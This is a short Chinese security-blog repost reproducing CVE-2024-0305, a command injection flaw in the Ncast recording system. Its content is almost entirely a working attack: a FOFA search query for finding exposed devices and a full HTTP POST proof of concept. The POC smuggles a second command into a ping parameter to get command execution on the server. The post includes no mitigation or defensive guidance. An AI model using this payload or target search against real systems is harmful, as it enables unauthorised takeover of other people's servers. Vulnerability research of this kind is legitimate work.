漏洞复现 || Ncast盈可视高清智能录播系统存在RCE(CVE-2024-0305)

admin
admin
admin
102421
文章
87
评论
2024年2月26日13:47:06评论45 views字数 647阅读2分9秒阅读模式

漏洞描述

Ncast盈可视录播系统存在漏洞,攻击者可利用此漏洞进行任意命令执行,通过漏洞攻击者可获取服务器权限。

漏洞复现 || Ncast盈可视高清智能录播系统存在RCE(CVE-2024-0305)

资产确定

fofa: icon_hash="-1253433910"

漏洞复现

1.利用如下POC执行”id“得到回显

POST /classes/common/busiFacade.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Firefox/121.0Connection: closeContent-Length: 98Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest



{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}

漏洞复现 || Ncast盈可视高清智能录播系统存在RCE(CVE-2024-0305)

原文始发于微信公众号(我爱林):漏洞复现 || Ncast盈可视高清智能录播系统存在RCE(CVE-2024-0305)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月26日13:47:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 || Ncast盈可视高清智能录播系统存在RCE(CVE-2024-0305)http://cn-sec.com/archives/2526156.html

发表评论

匿名网友 填写信息